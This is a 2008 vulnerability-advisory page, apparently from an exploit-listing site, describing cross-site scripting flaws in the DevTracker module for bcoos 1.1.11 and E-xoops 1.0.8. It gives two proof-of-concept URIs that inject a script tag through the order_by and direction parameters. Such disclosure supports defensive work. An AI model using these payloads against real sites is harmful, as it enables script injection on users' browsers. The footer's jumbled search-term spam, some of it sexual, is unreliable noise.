about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , DevTracker Module For bcoos and E-xoops Multiple Cross-Site Scripting Vulnerabilities


Title DevTracker Module For bcoos and E-xoops Multiple Cross-Site Scripting Vulnerabilities
Published 2008-02-04-12:00AM
Updated 2008-02-05-11:26PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Lostmon lords <lostmon@gmail.com> discovered these vulnerabilities.
Vulnerable  EXoops EXoops 1.0.8
bcoos bcoos 1.1.11
Not Vulnerable  
Code  Attackers can exploit these issues by enticing an unsuspecting user to follow a malicious URI.The following proof-of-concept URIs are available:http://www.example.com/modules/devtracker/index.php?proj_id=1&amp;order_by=priority&amp;direction=ASCquot;&gt;&lt;script&gt;alert()&lt;/script&gt; http://www.example.com/modules/devtracker/index.php?proj_id=1&amp;order_by=priorityquot;&gt;&lt;script&gt;alert()&lt;/script&gt;&amp;direction=ASC
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 23:00:10 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
hot couple hot+couple Free sex w hd pvr 920 www.wprlds Cross Site lzp0910.17 PHPKIY php-nuke 2 animals.se news searc batteleon nude pic a ketrina ka foto sex www.ini8.c linux scan www.lankas xxnxx Sex photo www.fuqile news for c 1.1.3 www.tnbnys Svech_ka rpc3.zip linux 2.4. sexy woma PhpBB 2.0. ASHWARIA R School gir Sxey search%2Fe Svech_ka www.web-sh PhpBB+2.0. 200 /compo Action gam CMS is Fre yourporn.c Ungoye sex news+for+c free nacke freeonline www.hkjyly news+for+c zahraamira php-nuke 2 nayanthras www.wapain